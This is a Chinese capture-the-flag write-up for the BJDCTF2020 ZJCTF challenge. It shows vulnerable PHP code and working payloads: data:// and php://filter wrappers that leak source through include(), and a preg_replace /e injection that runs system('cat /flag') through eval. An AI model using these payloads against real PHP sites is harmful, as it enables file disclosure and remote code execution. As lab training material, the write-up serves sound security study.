[BJDCTF2020]ZJCTF,不过如此

本文探讨了一段PHP源码,分析了如何通过特定参数绕过限制并执行任意代码。当$text等于'Ihaveadream'时,代码会读取并显示指定文件。存在preg_replace函数的漏洞,允许在/e模式下执行任意函数。通过构造URL,可以触发getFlag()函数来获取敏感信息,如'flag'。博客重点讨论了PHP安全和命令注入风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

分析一下源码,首先要设置text变量通过get传参过去,然后获取text这个文件 文件内容要等与"I have a dream"才能够绕过第一个进入到下一步。

这里应该可以利用php伪协议将文件内容写进去然后自己就可以控制文件内容,从而进入下一步。

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

当然在这里还有一种方法,使用php://input 读取post中的内容,也可以获取到,next.php文件的内容。

 

将base64解密后,获取到next.php的源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

这里可以看到有一个危险的函数可以执行命令。当然这里不需要使用这个函数,preg_replace /e模式下可以执行任意函数。

/next.php?\S*=${getFlag()}&cmd=system('cat /flag');

可以获取到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值